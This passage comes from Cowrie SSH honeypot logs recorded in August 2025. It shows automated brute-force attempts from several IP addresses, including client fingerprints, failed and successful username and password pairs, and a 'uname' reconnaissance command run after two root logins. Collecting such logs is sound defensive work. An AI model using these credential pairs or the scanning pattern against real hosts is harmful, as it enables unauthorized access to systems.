],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:24:41.304411Z","src_ip":"217.154.1.158","session":"e6ce17816269"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-26T19:24:41.347328Z","src_ip":"217.154.1.158","session":"e6ce17816269"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:24:42.364236Z","src_ip":"217.154.1.158","session":"e6ce17816269"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":57954,"dst_ip":"1.2.3.4","dst_port":22,"session":"48558e380856","protocol":"ssh","message":"New connection: 217.154.1.158:57954 (1.2.3.4:22) [session: 48558e380856]","sensor":"my-vps","timestamp":"2025-08-26T19:24:58.980549Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:24:58.981440Z","src_ip":"217.154.1.158","session":"48558e380856"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:24:58.995460Z","src_ip":"217.154.1.158","session":"48558e380856"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@WSX","message":"login attempt [oracle/!QAZ@WSX] failed","sensor":"my-vps","timestamp":"2025-08-26T19:24:59.041916Z","src_ip":"217.154.1.158","session":"48558e380856"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:25:00.058727Z","src_ip":"217.154.1.158","session":"48558e380856"}
{"eventid":"cowrie.session.closed","duration":"34.1","message":"Connection lost after 34.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:25:00.508659Z","src_ip":"212.227.235.229","session":"b853c706b32d"}
{"eventid":"cowrie.session.connect","src_ip":"118.194.250.127","src_port":22286,"dst_ip":"1.2.3.4","dst_port":22,"session":"54ea8c0b4a23","protocol":"ssh","message":"New connection: 118.194.250.127:22286 (1.2.3.4:22) [session: 54ea8c0b4a23]","sensor":"my-vps","timestamp":"2025-08-26T19:25:03.338848Z"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:25:04.147078Z","src_ip":"118.194.250.127","session":"54ea8c0b4a23"}
{"eventid":"cowrie.session.connect","src_ip":"118.194.250.127","src_port":22490,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9314530faae","protocol":"ssh","message":"New connection: 118.194.250.127:22490 (1.2.3.4:22) [session: d9314530faae]","sensor":"my-vps","timestamp":"2025-08-26T19:25:04.347888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_7.4","message":"Remote SSH version: SSH-2.0-OpenSSH_7.4","sensor":"my-vps","timestamp":"2025-08-26T19:25:04.393104Z","src_ip":"118.194.250.127","session":"d9314530faae"}
{"eventid":"cowrie.client.kex","hassh":"ec9ea89c70f5fc71cf61061bff5e4740","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: ec9ea89c70f5fc71cf61061bff5e4740","sensor":"my-vps","timestamp":"2025-08-26T19:25:04.443321Z","src_ip":"118.194.250.127","session":"d9314530faae"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:25:04.751374Z","src_ip":"118.194.250.127","session":"d9314530faae"}
{"eventid":"cowrie.session.connect","src_ip":"118.194.250.127","src_port":22952,"dst_ip":"1.2.3.4","dst_port":22,"session":"950912ca8336","protocol":"ssh","message":"New connection: 118.194.250.127:22952 (1.2.3.4:22) [session: 950912ca8336]","sensor":"my-vps","timestamp":"2025-08-26T19:25:06.001465Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_7.4","message":"Remote SSH version: SSH-2.0-OpenSSH_7.4","sensor":"my-vps","timestamp":"2025-08-26T19:25:06.047696Z","src_ip":"118.194.250.127","session":"950912ca8336"}
{"eventid":"cowrie.client.kex","hassh":"e788c657d1a22971d5026526ffd2e918","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-cbc,3des-cbc,blowfish-cbc,aes192-cbc,aes256-cbc,aes128-ctr,aes192-ctr,aes256-ctr;hmac-md5,hmac-sha1,hmac-ripemd160;none","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa"],"encCS":["aes128-cbc","3des-cbc","blowfish-cbc","aes192-cbc","aes256-cbc","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-md5","hmac-sha1","hmac-ripemd160"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e788c657d1a22971d5026526ffd2e918","sensor":"my-vps","timestamp":"2025-08-26T19:25:06.048879Z","src_ip":"118.194.250.127","session":"950912ca8336"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:25:06.408514Z","src_ip":"118.194.250.127","session":"950912ca8336"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43828,"dst_ip":"1.2.3.4","dst_port":22,"session":"88f4df69bb2b","protocol":"ssh","message":"New connection: 212.227.235.229:43828 (1.2.3.4:22) [session: 88f4df69bb2b]","sensor":"my-vps","timestamp":"2025-08-26T19:25:11.107042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:25:11.108176Z","src_ip":"212.227.235.229","session":"88f4df69bb2b"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:25:11.191329Z","src_ip":"212.227.235.229","session":"88f4df69bb2b"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":59360,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff67342f9a52","protocol":"ssh","message":"New connection: 217.154.1.158:59360 (1.2.3.4:22) [session: ff67342f9a52]","sensor":"my-vps","timestamp":"2025-08-26T19:25:16.529739Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:25:16.530757Z","src_ip":"217.154.1.158","session":"ff67342f9a52"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:25:16.543735Z","src_ip":"217.154.1.158","session":"ff67342f9a52"}
{"eventid":"cowrie.login.failed","username":"test","password":"1234qwer","message":"login attempt [test/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-26T19:25:16.602511Z","src_ip":"217.154.1.158","session":"ff67342f9a52"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:25:17.618315Z","src_ip":"217.154.1.158","session":"ff67342f9a52"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:25:19.889163Z","src_ip":"212.227.235.229","session":"bc4e1ee50479"}
{"eventid":"cowrie.session.closed","duration":180.26119422912598,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:25:19.894370Z","src_ip":"212.227.235.229","session":"bc4e1ee50479"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":40804,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a76a90e51ad","protocol":"ssh","message":"New connection: 217.154.1.158:40804 (1.2.3.4:22) [session: 3a76a90e51ad]","sensor":"my-vps","timestamp":"2025-08-26T19:25:34.010542Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:25:34.011268Z","src_ip":"217.154.1.158","session":"3a76a90e51ad"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:25:34.025625Z","src_ip":"217.154.1.158","session":"3a76a90e51ad"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:25:34.068310Z","src_ip":"217.154.1.158","session":"3a76a90e51ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:25:34.118731Z","src_ip":"217.154.1.158","session":"3a76a90e51ad"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:25:34.119413Z","src_ip":"217.154.1.158","session":"3a76a90e51ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:25:34.134377Z","src_ip":"217.154.1.158","session":"3a76a90e51ad"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:25:34.135358Z","src_ip":"217.154.1.158","session":"3a76a90e51ad"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64482,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f02411e63bd","protocol":"ssh","message":"New connection: 217.72.205.35:64482 (1.2.3.4:22) [session: 4f02411e63bd]","sensor":"my-vps","timestamp":"2025-08-26T19:25:41.816219Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:25:41.817235Z","src_ip":"217.72.205.35","session":"4f02411e63bd"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":37606,"dst_ip":"1.2.3.4","dst_port":22,"session":"73318ada75a3","protocol":"ssh","message":"New connection: 217.154.1.158:37606 (1.2.3.4:22) [session: 73318ada75a3]","sensor":"my-vps","timestamp":"2025-08-26T19:25:51.395226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:25:51.399851Z","src_ip":"217.154.1.158","session":"73318ada75a3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:25:51.409691Z","src_ip":"217.154.1.158","session":"73318ada75a3"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456","message":"login attempt [developer/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:25:51.464703Z","src_ip":"217.154.1.158","session":"73318ada75a3"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:25:52.481585Z","src_ip":"217.154.1.158","session":"73318ada75a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8159,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b87982c6451","protocol":"ssh","message":"New connection: 212.227.235.229:8159 (1.2.3.4:22) [session: 9b87982c6451]","sensor":"my-vps","timestamp":"2025-08-26T19:26:04.237715Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:26:04.239787Z","src_ip":"212.227.235.229","session":"9b87982c6451"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T19:26:04.447526Z","src_ip":"212.227.235.229","session":"9b87982c6451"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":35774,"dst_ip":"1.2.3.4","dst_port":22,"session":"404d6597cffd","protocol":"ssh","message":"New connection: 217.154.1.158:35774 (1.2.3.4:22) [session: 404d6597cffd]","sensor":"my-vps","timestamp":"2025-08-26T19:26:08.841970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:26:08.842766Z","src_ip":"217.154.1.158","session":"404d6597cffd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:26:08.856667Z","src_ip":"217.154.1.158","session":"404d6597cffd"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:26:08.899595Z","src_ip":"217.154.1.158","session":"404d6597cffd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:26:09.012951Z","src_ip":"217.154.1.158","session":"404d6597cffd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:26:09.013651Z","src_ip":"217.154.1.158","session":"404d6597cffd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:26:09.029095Z","src_ip":"217.154.1.158","session":"404d6597cffd"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:26:09.030271Z","src_ip":"217.154.1.158","session":"404d6597cffd"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:26:12.238439Z","src_ip":"212.227.235.229","session":"9b87982c6451"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":38020,"dst_ip":"1.2.3.4","dst_port":22,"session":"a243c3c3218b","protocol":"ssh","message":"New connection: 217.154.1.158:38020 (1.2.3.4:22) [session: a243c3c3218b]","sensor":"my-vps","timestamp":"2025-08-26T19:26:26.305976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:26:26.306889Z","src_ip":"217.154.1.158","session":"a243c3c3218b"}
